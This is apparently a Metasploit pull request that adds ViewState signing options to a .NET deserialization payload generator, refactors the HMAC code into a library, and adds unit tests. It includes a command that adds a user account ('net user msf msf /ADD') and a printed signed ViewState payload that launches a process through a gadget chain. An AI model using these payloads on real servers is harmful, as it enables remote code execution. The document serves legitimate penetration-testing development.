### PR TITLE
Feat/tool/ysoserial/viewstate

### DIFF
--- a/docs/metasploit-framework.wiki/Dot-Net-Deserialization.md
+++ b/docs/metasploit-framework.wiki/Dot-Net-Deserialization.md
@@ -82,24 +82,41 @@ Generate a .NET deserialization payload that will execute an operating system
 command using the specified gadget chain and formatter.
 
 Available formatters:
-   * BinaryFormatter
-   * LosFormatter
-   * SoapFormatter
+  * BinaryFormatter
+  * LosFormatter
+  * SoapFormatter
 
 Available gadget chains:
-   * TextFormattingRunProperties
-   * TypeConfuseDelegate
-   * WindowsIdentity
+  * ClaimsPrincipal
+  * DataSet
+  * DataSetTypeSpoof
+  * ObjectDataProvider
+  * TextFormattingRunProperties
+  * TypeConfuseDelegate
+  * WindowsIdentity
 
-Example: ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TextFormattingRunProperties
+Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5
 
-Specific options:
-   -c, --command   <String>         The command to run
-   -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
-   -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
-   -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
-       --list-output-formats        List available output formats, for use with --output
-   -h, --help                       Show this message
+Examples:
+  ./dot_net.rb -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
+  ./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
+    --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
+
+General options:
+    -h, --help                       Show this message
+    -c, --command   <String>         The command to run
+    -f, --formatter <String>         The formatter to use (default: BinaryFormatter)
+    -g, --gadget    <String>         The gadget chain to use (default: TextFormattingRunProperties)
+    -o, --output    <String>         The output format to use (default: raw, see: --list-output-formats)
+        --list-output-formats        List available output formats, for use with --output
+
+ViewState related options:
+        --viewstate-generator             <String>
+                                     The ViewState generator string to use
+        --viewstate-validation-algorithm  <String>
+                                     The validation algorithm (default: SHA1, see: Available HMAC algorithms)
+        --viewstate-validation-key        <HexString>
+                                     The validationKey from the web.config file
 ```
 
 The `-g` / `--gadget` option maps to the *gadget_chain* argument for the

--- a/lib/msf/core/exploit/view_state.rb
+++ b/lib/msf/core/exploit/view_state.rb
@@ -51,60 +51,29 @@ module Exploit::ViewState
   end
 
   def generate_viewstate(data, extra: '', algo: 'sha1', key: '')
-    # Generate ViewState HMAC from known values and validation key
-    hmac = generate_viewstate_hmac(data + extra, algo: algo, key: key)
-
-    # Append HMAC to provided data and Base64-encode the whole shebang
-    Rex::Text.encode_base64(data + hmac)
+    Rex::Exploit::ViewState.generate_viewstate(data, extra: extra, algo: algo, key: key)
   end
 
   def generate_viewstate_hmac(data, algo: 'sha1', key: '')
-    OpenSSL::HMAC.digest(algo, key, data)
+    Rex::Exploit::ViewState.generate_viewstate_hmac(data, algo: algo, key: key)
   end
 
   def decode_viewstate(encoded_viewstate, algo: 'sha1')
-    viewstate = Rex::Text.decode_base64(encoded_viewstate)
+    decoded = Rex::Exploit::ViewState.decode_viewstate(encoded_viewstate, algo: algo)
 
-    unless Rex::Text.encode_base64(viewstate) == encoded_viewstate
-      vprint_error('Could not decode ViewState')
-      return { data: nil, hmac: nil }
-    end
-
-    hmac_len = generate_viewstate_hmac('', algo: algo).length
-
-    if (data = viewstate[0...-hmac_len]).empty?
-      vprint_error('Could not parse ViewState data')
-      data = nil
-    end
-
-    unless (hmac = viewstate[-hmac_len..-1])
-      vprint_error('Could not parse ViewState HMAC')
-    end
-
-    { data: data, hmac: hmac }
+    vprint_error('Could not parse ViewState data') unless decoded[:data].present?
+    vprint_error('Could not parse ViewState HMAC') unless decoded[:hmac].present?
+    decoded
+  rescue Rex::Exploit::ViewState::Error => error
+    vprint_error("#{error.class.name}: #{error.message}")
+    return { data: nil, hmac: nil }
   end
 
   def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
-    viewstate = decode_viewstate(encoded_viewstate)
-
-    unless viewstate[:data]
-      vprint_error('Could not retrieve ViewState data')
-      return false
-    end
-
-    unless (their_hmac = viewstate[:hmac])
-      vprint_error('Could not retrieve ViewState HMAC')
-      return false
-    end
-
-    our_hmac = generate_viewstate_hmac(
-      viewstate[:data] + extra,
-      algo: algo,
-      key: key
-    )
-
-    # Do we have what it takes?
-    our_hmac == their_hmac
+    Rex::Exploit::ViewState.can_sign_viewstate?(encoded_viewstate, extra: extra, algo: algo, key: key)
+  rescue Rex::Exploit::ViewState::Error => error
+    vprint_error("#{error.class.name}: #{error.message}")
+    return false
   end
 
   # Extract __VIEWSTATE from HTML

--- a/lib/rex/exploit/view_state.rb
+++ b/lib/rex/exploit/view_state.rb
@@ -1,0 +1,68 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Exploit
+    class ViewState
+      class Error < Rex::RuntimeError
+      end
+
+      def self.decode_viewstate(encoded_viewstate, algo: 'sha1')
+        viewstate = Rex::Text.decode_base64(encoded_viewstate)
+
+        unless Rex::Text.encode_base64(viewstate) == encoded_viewstate
+          raise Error.new('Could not decode ViewState')
+        end
+
+        hmac_len = OpenSSL::Digest.new(algo).digest_length
+
+        if (data = viewstate[0...-hmac_len]).empty?
+          data = nil
+        end
+
+        hmac = viewstate[-hmac_len..-1]
+        unless hmac&.length == hmac_len
+          raise Error.new('Could not decode ViewState')
+        end
+
+        { data: data, hmac: hmac }
+      end
+
+      def self.generate_viewstate(data, extra: '', algo: 'sha1', key: '')
+        # Generate ViewState HMAC from known values and validation key
+        hmac = generate_viewstate_hmac(data + extra, algo: algo, key: key)
+
+        # Append HMAC to provided data and Base64-encode the whole shebang
+        Rex::Text.encode_base64(data + hmac)
+      end
+
+      def self.generate_viewstate_hmac(data, algo: 'sha1', key: '')
+        OpenSSL::HMAC.digest(algo, key, data)
+      end
+
+      def self.is_viewstate_valid?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
+        viewstate = decode_viewstate(encoded_viewstate)
+
+        unless viewstate[:data]
+          raise Error.new('Could not retrieve ViewState data')
+        end
+
+        unless (their_hmac = viewstate[:hmac])
+          raise Error.new('Could not retrieve ViewState HMAC')
+        end
+
+        our_hmac = generate_viewstate_hmac(
+          viewstate[:data] + extra,
+          algo: algo,
+          key: key
+        )
+
+        # Do we have what it takes?
+        our_hmac == their_hmac
+      end
+
+      class << self
+        alias_method :can_sign_viewstate?, :is_viewstate_valid?
+      end
+    end
+  end
+end

--- a/spec/lib/rex/exploit/view_state_spec.rb
+++ b/spec/lib/rex/exploit/view_state_spec.rb
@@ -1,0 +1,67 @@
+require 'spec_helper'
+require 'rex/version'
+
+require 'rex/text'
+
+# rubocop:disable Lint/DeprecatedGemVersion
+RSpec.describe Rex::Exploit::ViewState do
+  let(:data) { Random.new.bytes(rand(10..100)) }
+  let(:key) { Random.new.bytes(20) }
+
+  context 'when the algorithm is SHA-1' do
+    let(:algo) { 'sha1' }
+
+    describe '.decode_viewstate' do
+      let(:encoded) { described_class.generate_viewstate(data, algo: algo, key: key) }
+
+      it 'returns the data and HMAC' do
+        decoded = described_class.decode_viewstate(encoded, algo: algo)
+        expect(decoded).to be_a Hash
+        expect(decoded[:data]).to eq data
+        expect(decoded[:hmac]).to eq described_class.generate_viewstate_hmac(data, algo: algo, key: key)
+      end
+    end
+
+    describe '.generate_viewstate' do
+      it 'generates the HMAC signature' do
+        expect(described_class).to receive(:generate_viewstate_hmac).with(data, algo: algo, key: key).and_call_original
+        described_class.generate_viewstate(data, algo: algo, key: key)
+      end
+
+      it 'generates a Base64 encoded blob' do
+        viewstate = described_class.generate_viewstate(data, algo: algo, key: key)
+        debase64ed = Rex::Text.decode_base64(viewstate)
+        expect(debase64ed).to eq data + described_class.generate_viewstate_hmac(data, algo: algo, key: key)
+      end
+    end
+
+    describe '.generate_viewstate_hmac' do
+      it 'delegates to OpenSSL::HMAC' do
+        expect(OpenSSL::HMAC).to receive(:digest).with(algo, key,data)
+        described_class.generate_viewstate_hmac(data, algo: algo, key: key)
+      end
+
+      it 'generates a 20 byte HMAC' do
+        hmac = described_class.generate_viewstate_hmac(data, algo: algo, key: key)
+        expect(hmac.bytesize).to eq 20
+      end
+    end
+
+    describe '.is_viewstate_valid?' do
+      let(:encoded) { described_class.generate_viewstate(data, algo: algo, key: key) }
+
+      it 'raises an Error when it can not be decoded' do
+        # use key.length / 2 to guarantee there is not enough data for the key to be found
+        expect { described_class.is_viewstate_valid?(Rex::Text.encode_base64('A' * (key.length / 2))) }.to raise_error(described_class::Error)
+      end
+
+      it 'returns true for the correct key' do
+        expect(described_class.is_viewstate_valid?(encoded, algo: algo, key: key)).to be_truthy
+      end
+
+      it 'returns false for the incorrect key' do
+        expect(described_class.is_viewstate_valid?(encoded, algo: algo, key: key + '#')).to be_falsey
+      end
+    end
+  end
+end

--- a/tools/payloads/ysoserial/dot_net.rb
+++ b/tools/payloads/ysoserial/dot_net.rb
@@ -23,10 +23,15 @@ Generate a .NET deserialization payload that will execute an operating system
 command using the specified gadget chain and formatter.
 
 Available formatters:
-#{DND::Formatters::NAMES.map { |n| "    * #{n}\n"}.join}
+#{DND::Formatters::NAMES.map { |n| "  * #{n}\n"}.join}
 Available gadget chains:
-#{DND::GadgetChains::NAMES.map { |n| "    * #{n}\n"}.join}
-Example: #{__FILE__} -c "net user msf msf /ADD" -f BinaryFormatter -g TextFormattingRunProperties
+#{DND::GadgetChains::NAMES.map { |n| "  * #{n}\n"}.join}
+Available HMAC algorithms: SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5
+
+Examples:
+  #{__FILE__} -c "net user msf msf /ADD" -f BinaryFormatter -g TypeConfuseDelegate -o base64
+  #{__FILE__} -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \\
+    --viewstate-validation-key deadbeef --viewstate-validation-algorithm SHA1
 }.strip
 
 def puts_transform_formats
@@ -63,7 +68,7 @@ module YSoSerialDotNet
           options[:output_format] = v.downcase
         end
 
-        opt.on('--viewstate-validation-algorithm  <String>', 'The validation algorithm') do |v|
+        opt.on('--viewstate-validation-algorithm  <String>', 'The validation algorithm (default: SHA1, see: Available HMAC algorithms)') do |v|
           normalized = v.upcase.delete_prefix('HMAC')
           unless %w[SHA1 SHA256 SHA384 SHA512 MD5].include?(normalized)
             raise OptionParser::InvalidArgument, "--viewstate-validation-algorithm must be one of SHA1 HMACSHA256 HMACSHA384 HMACSHA512 MD5"


### PR DESCRIPTION
This updates the existing `tools/payloads/ysoserial/dot_net.rb` tool to add options for encoding the resulting payload as a viewstate. There are currently three viewstate related options, of which only `--viewstate-validation-key` is required. The other options have reasonable defaults. To keep this code DRY, much of it was moved out of the mixin and into a Rex library that the CLI tool can access. Unit tests were added for this code.

There only appears to be a small handful of modules using the ViewState mixin. The easiest way I found to test it was to use the `exploit/windows/http/plesk_mylittleadmin_viewstate` module and invoke the method using Pry and the module's own default values.

By comparing the MD5 hash before and after the changes, and seeing that they are the same, we can determine that the functionality was maintained after the code was refactored into the Rex library.

```
[1] pry(#<Msf::Modules::Exploit__Windows__Http__Plesk_mylittleadmin_viewstate::MetasploitModule>)> OpenSSL::Digest::MD5.hexdigest(generate_viewstate_payload('calc.exe', key: VIEWSTATE_VALIDATION_KEY, extra: [VIEWSTATE_GENERATOR.to_i(16)].pack('V')))
=> "2cf2aeae80ca97ea6fe5499730feadad"
```

## Testing

- [ ] See that the unit tests pass
- [ ] Load up an unmodified version of msfconsole (one without these changes) and use the `plesk_mylittleadmin_viewstate` module and take note of the MD5 hash using the Pry command from above
- [ ] Load up msfconsole with these changes and repeat the process, see that the MD5 hash is the same showing the resulting blobs are identical
- [ ] Use the new `tools/payloads/ysoserial/dot_net.rb` options to encode viewstates
    - [ ] Make sure that the help output makes sense
    - [ ] Try out all three options
    - [ ] See that invalid values are caught and reported in a way that makes sense

## Demo

```
./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
    --viewstate-validation-key deadbeef --viewstate-generator deadbeef --viewstate-validation-algorithm HMACSHA256
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Gadget chain: TextFormattingRunProperties
Formatter:    LosFormatter
Size:         1016
/wEy1AUAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD2AzxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6WD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIHhtbG5zOlM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiB4bWxuczpEPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1zeXN0ZW0iPjxPYmplY3REYXRhUHJvdmlkZXIgWDpLZXk9IiIgT2JqZWN0VHlwZT0ie1g6VHlwZSBEOlByb2Nlc3N9IiBNZXRob2ROYW1lPSJTdGFydCI+PE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPjxTOlN0cmluZz5jbWQ8L1M6U3RyaW5nPjxTOlN0cmluZz4vYyBjYWxjLmV4ZTwvUzpTdHJpbmc+PC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz48L09iamVjdERhdGFQcm92aWRlcj48L1Jlc291cmNlRGljdGlvbmFyeT4L+DRPQ761U2uRllbktXLn0v/WI9aNMDrpO+CDt30o6fQ=
```

Closes #18894